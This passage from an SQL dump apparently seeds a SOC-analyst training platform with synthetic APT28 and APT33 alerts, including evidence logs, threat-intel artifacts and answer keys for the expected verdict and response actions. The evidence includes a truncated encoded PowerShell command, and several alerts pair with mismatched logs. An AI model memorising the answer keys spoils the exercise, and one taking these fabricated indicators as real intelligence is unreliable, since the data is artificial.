'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT28 C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"APT28 associated IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"X-Agent malware sample\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\xagent.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"LocalEDR\",\"verdict\":\"malicious\",\"details\":\"Detected execution of known APT28 malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(799, 'X-Tunnel Backdoor Established', 'high', 'Network traffic analysis', 'The attackers have successfully established a persistent backdoor using the X-Tunnel tool to maintain secure communication with their command and control servers. This is an intermediate level threat indicating ongoing persistent access.', 'Persistence', 'T1105 - Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-07T14:23:45Z\",\"event_id\":\"1003\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"185.92.220.75\",\"protocol\":\"TCP\",\"port\":\"443\",\"filename\":\"x-tunnel-backdoor.exe\",\"file_hash\":\"7b9f8e2b5f9c3a4d5e6f7a8b9c0d1e2f\",\"username\":\"jdoe\",\"action\":\"establish_connection\",\"description\":\"Established connection between internal host and external C2 server using encrypted tunnel.\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP associated with APT28.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7b9f8e2b5f9c3a4d5e6f7a8b9c0d1e2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known X-Tunnel malware used by APT28.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(800, 'Credential Dump for Lateral Movement', 'high', 'Active Directory logs', 'APT28 has utilized harvested credentials to perform lateral movement within the DNC network. The threat actor aimed to maximize access and control over critical systems by leveraging stolen credentials.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"ip_address\":\"185.123.45.67\",\"username\":\"j.doe\",\"domain\":\"DNC\",\"target_server\":\"192.168.1.15\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"ntds.dit\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT28 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Employee account used in suspicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash related to possible credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ntds.dit\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Critical Active Directory database file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(801, 'Data Exfiltration to External Servers', 'high', 'Data loss prevention (DLP) systems', 'Sensitive data exfiltrated to external servers and later weaponized to influence the 2016 election.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:47Z\",\"event_id\":\"DLPE-20231005142247\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"198.51.100.14\",\"username\":\"jdoe\",\"exfiltrated_files\":[{\"filename\":\"confidential_report_2023.pdf\",\"hash\":\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\",\"size\":\"3.2MB\"}],\"related_domain\":\"malicious-exfiltration.com\",\"connection_protocol\":\"HTTPS\",\"detection_method\":\"anomalous data transfer\",\"description\":\"Large data transfer detected to external IP associated with known malicious domain.\",\"correlation_id\":\"C-20231005-XYZ123\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT28 and previous exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee with access to sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash potentially linked to known exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain used in previous APT28 
campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data 
transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious 
domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.449Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(802, 'Unusual RDP Logins Detected', 'high', 'Network Security Logs', 'APT33 initiated an attack by exploiting weak RDP credentials to gain unauthorized access to Saudi Aramco\'s network. Multiple login attempts were observed from a known malicious IP address.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:23:45Z\",\"event_type\":\"RDP Login Attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.15.87\",\"username\":\"admin_user\",\"success\":false,\"attempt_count\":5,\"associated_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"rdp_brute_force.exe\",\"log_id\":\"123456789\"}', '2026-01-12 22:17:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT33 campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.87\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of Saudi Aramco network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"Unexpected login attempts for this account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash related to known APT33 malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"rdp_brute_force.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in brute force RDP 
attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(803, 'Execution of Malicious Payload', 'critical', 'Endpoint Detection and Response (EDR) Systems', 'The attackers executed the Shamoon payload, initiating the process of wiping data from targeted workstations. This action is indicative of the destructive phase of the attack.', 'Execution', 'T1486 - Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_type\":\"process_execution\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"workstation-23\",\"user\":\"jdoe\",\"process_name\":\"wiper.exe\",\"process_id\":4567,\"parent_process_name\":\"cmd.exe\",\"parent_process_id\":1234,\"command_line\":\"C:\\\\Windows\\\\System32\\\\wiper.exe -run\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.66\",\"attacker_domain\":\"malicious-actor.example.com\"}', '2026-01-12 22:17:37', '2026-02-16 17:59:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous Shamoon attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Shamoon malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wiper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_detection\",\"verdict\":\"malicious\",\"details\":\"Executable known to be used by Shamoon malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(804, 'Registry Modification and Service Creation', 'high', 'Windows Registry Logs', 'APT33 has been detected modifying registry keys and creating a new service named \'WinSecureService\' to maintain the persistence of wiper malware across system reboots. The modification involved adding autorun registry entries and creating a service linked to the malicious binary \'wiper.exe\'.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:37Z\",\"event_id\":4657,\"user\":\"admin_user\",\"computer_name\":\"compromised-host.internal\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"new_service_name\":\"WinSecureService\",\"service_executable\":\"C:\\\\Windows\\\\System32\\\\wiper.exe\",\"malware_hash\":\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"action\":\"Registry Key Modified, Service Created\"}', '2026-01-12 22:17:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT33 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"wiper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with APT33 wiper campaign.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT33 malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 
0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
